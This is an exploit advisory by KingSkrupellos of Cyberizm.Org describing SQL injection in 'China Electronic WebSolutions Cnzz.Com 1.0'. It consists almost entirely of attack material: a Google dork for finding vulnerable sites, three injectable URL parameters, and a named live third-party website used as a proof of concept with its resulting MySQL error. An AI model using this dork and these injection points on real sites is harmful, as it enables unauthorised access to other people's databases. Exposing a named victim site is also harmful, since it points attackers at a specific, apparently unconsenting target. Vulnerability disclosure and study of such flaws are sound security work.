#################################################################################################

# Exploit Title : China Electronic WebSolutions Cnzz.Com 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : Cnzz.Com
# Google Dork : inurl:''/productlist.php?cate=''
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Version Information : 1.0
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]
# Cyberizm.Org Exploit Reference Link :
cyberizm.org/cyberizm-china-electronic-websolutions-cnzz-sql-injection-vuln.html

#################################################################################################

+ China Electronic WebSolutions Cnzz.Com SQL Injection Vulnerability

#################################################################################################

SQL Injection Exploits =

/aboutus.php?id=[SQL Injection]

/productlist.php?cate=[SQL Injection]

/newsdetail.php?id=[SQL Injection]

#################################################################################################

# Example Site =>  xuhegd.com/aboutus.php?id=1%27 => [ Proof of Concept for
SQL Inj ] => archive.is/NRzdT

# SQL-DB Error => You have an error in your SQL syntax; check the manual
that corresponds to your
MySQL server version for the right syntax to use near ''1''' at line 1

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################